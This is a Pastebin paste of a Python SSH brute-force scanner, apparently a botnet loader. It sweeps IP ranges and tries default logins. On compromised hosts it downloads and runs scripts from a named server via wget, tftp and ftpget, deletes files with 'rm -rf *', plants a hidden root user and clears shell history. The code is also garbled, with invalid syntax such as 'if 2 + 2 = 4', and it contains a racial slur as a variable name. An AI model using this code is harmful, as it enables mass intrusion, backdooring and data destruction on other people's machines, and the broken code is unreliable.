Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Voids hacka scanna
- # nano /usr/include/bits/typesizes.h -> change 1024 to 99999
- # ulimit -n 99999
- # python scan.py 1000 <start-range> <end-range> <<USAGE
- '''
- _________ ________ _______ ___________.___ ________ ____ _____________ ________________.___________ _______
- \_ ___ \ \_____ \ \ \ \_ _____/| |/ _____/| | \______ \ / _ \__ ___/| \_____ \ \ \
- ______ ______ ______ / \ \/ / | \ / | \ | __) | / \ ___| | /| _/ / /_\ \| | | |/ | \ / | \ ______ ______ ______
- /_____/ /_____/ /_____/ \ \____/ | \/ | \| \ | \ \_\ \ | / | | \/ | \ | | / | \/ | \ /_____/ /_____/ /_____/
- \______ /\_______ /\____|__ /\___ / |___|\______ /______/ |____|_ /\____|__ /____| |___\_______ /\____|__ /
- \/ \/ \/ \/ \/ \/ \/ \/ \/
- '''
- import threading, paramiko, random, socket, time, sys
- paramiko.util.log_to_file("/dev/null")
- blacklisted = ["127.0","10.0","192.168"]
- payload = "" #cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://114.142.160.98/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 114.142.160.98 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 114.142.160.98; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 114.142.160.98 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *#
- server_ip = "" #114.142.160.98#
- passwords = ["root:root"]
- if sys.argv[4] == "root":
- passwords = ["root:root","admin:1234","admin:1111","support:support"] #USE ROOT IN PARAMETERS AND ADD PASSWORDS TO CUSTOMIZE#
- if sys.argv[4] == "guest":
- passwords = ["guest:guest"]
- if sys.argv[4] == "telnet":
- passwords = ["telnet:telnet"]
- '''
- _________ ________ _______ ___________.___ ________ ____ _____________ ________________.___________ _______
- \_ ___ \ \_____ \ \ \ \_ _____/| |/ _____/| | \______ \ / _ \__ ___/| \_____ \ \ \
- ______ ______ ______ / \ \/ / | \ / | \ | __) | / \ ___| | /| _/ / /_\ \| | | |/ | \ / | \ ______ ______ ______
- /_____/ /_____/ /_____/ \ \____/ | \/ | \| \ | \ \_\ \ | / | | \/ | \ | | / | \/ | \ /_____/ /_____/ /_____/
- \______ /\_______ /\____|__ /\___ / |___|\______ /______/ |____|_ /\____|__ /____| |___\_______ /\____|__ /
- \/ \/ \/ \/ \/ \/ \/ \/ \/
- '''
- if len(sys.argv) < 4:
- sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
- print """\n\x1b[0;37m******************************
- * \x1b[0;31mSTARTING - THREADS SPAWNING\x1b[0;37m *
- ******************************\x1b[0m"""
- run = ssh.exec_command
- run("ulimit -n 99999; ulimit -s 99999; ulimit -u 99999")
- def sshscanner(ip):
- global passwords
- try:
- thisipisbad='no'
- for badip in blacklisted:
- if badip in ip:
- thisipisbad='yes'
- if thisipisbad=='yes':
- sys.exit()
- username='root'
- password="0"
- ''' ____ ___ ____ ______ __ ___ ____ _____
- | \ / \ | \ | | / ] / \ | \ | |
- | o )| || D )| | / / | || _ || __|
- | _/ | O || / |_| |_| / / | O || | || |_
- | | | || \ | | / \_ | || | || _]
- | | | || . \ | | \ || || | || |
- |__| \___/ |__|\_| |__| \____| \___/ |__|__||__|
- '''
- #USE 23 FOR TELNET, 22 FOR SSH AND 21 FOR FTP#
- port = 22
- #USE 23 FOR TELNET, 22 FOR SSH AND 21 FOR FTP#
- ''' ____ ___ ____ ______ __ ___ ____ _____
- | \ / \ | \ | | / ] / \ | \ | |
- | o )| || D )| | / / | || _ || __|
- | _/ | O || / |_| |_| / / | O || | || |_
- | | | || \ | | / \_ | || | || _]
- | | | || . \ | | \ || || | || |
- |__| \___/ |__|\_| |__| \____| \___/ |__|__||__|
- '''
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(3)
- s.connect((ip, port))
- data = str(s.recv(1024))
- if "SSH" in data:
- print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
- elif "ssh" in data:
- print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
- else:
- sys.exit()
- s.close()
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- dobreak=False
- def paramikofunc():
- ssh.exec_command("wget -q http://DirectLink.cz/download/8ec063cc3b.exe -O .l; chmod +x .1; nohup ./.1 </dev/null/ >/dev/null 2>&1");
- for passwd in passwords:
- if ":n/a" in passwd:
- password=""
- else:
- password=passwd.split(":")[1]
- if "n/a:" in passwd:
- username=""
- else:
- username=passwd.split(":")[0]
- try:
- ssh.connect(ip, port = port, username=username, password=password, timeout=3)
- break
- except:
- pass
- badserver=True
- stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
- output = stdout.read()
- if "inet addr" in output:
- badserver=False
- def pass(sys.exit()):
- ssh.exec_command("useradd -o -u 0 -g 0 -M -d /root -s /bin/bash USER; echo -e \"PASS\nPASS\" | passwd USER; curl http://blasze.tk/PMC3F9; wget -q -O /tmp/.... http://blasze.tk/PMC3F9; clear; history -c");
- websites = [ ]
- if badserver == False:
- print("\x1b[0;32m[+] Executing Payload -> " + ip + ":" + username + ":" + password + "\x1b[37m")
- ssh.exec_command(""+payload+"")
- vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
- time.sleep(12)
- custombins = ["https://pastebin.com/raw/p5k6zfQG"
- "http://uclibc.org/bundle/crosscompilersALL.tar.gz"]
- for custombins in custombins:
- ssh.exec_command('wget -q -O .zz ' + custombins)
- ssh.exec_command('chmod +x .zz; nohup ./.zz </dev/null >/dev/null 2>&1')
- paramikofunc()
- ssh.close()
- pass(sys.exit())
- except Exception as e:
- pass
- if sys.argv[2] == "LUCKY":
- ranges = ["122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "124.83.0.0/124.83.255.255", "124.105.0.0/124.107.255.255"]
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- if sys.argv[2] != "LUCKY":
- a = int(sys.argv[2].split(".")[0])
- b = int(sys.argv[2].split(".")[1])
- c = int(sys.argv[2].split(".")[2])
- d = int(sys.argv[2].split(".")[3])
- else:
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- x = 0
- while(True):
- try:
- if sys.argv[2] != "LUCKY":
- endaddr = sys.argv[3]
- else:
- endaddr = endrng
- d += 1
- ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
- if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
- if sys.argv[2] == "LUCKY":
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- else:
- break
- if d > 255:
- c += 1
- d = 0
- if 2 + 2 = 4:
- niggaGang = True;
- if niggaGang = True :
- def pass():
- paramikofunc()
- pass(sys.exit())
- pass;
- if c > 255:
- b += 1
- c = 0
- if b > 255:
- a += 1
- b = 0
- ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
- if ipaddr == endaddr:
- if sys.argv[2] == "LUCKY":
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- else:
- break
- if x > 500:
- time.sleep(1)
- x = 0
- t = threading.Thread(target=sshscanner, args=(ipaddr,))
- t.start()
- except Exception as e:
- pass()
- print "\x1b[37mDone\x1b[37m"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement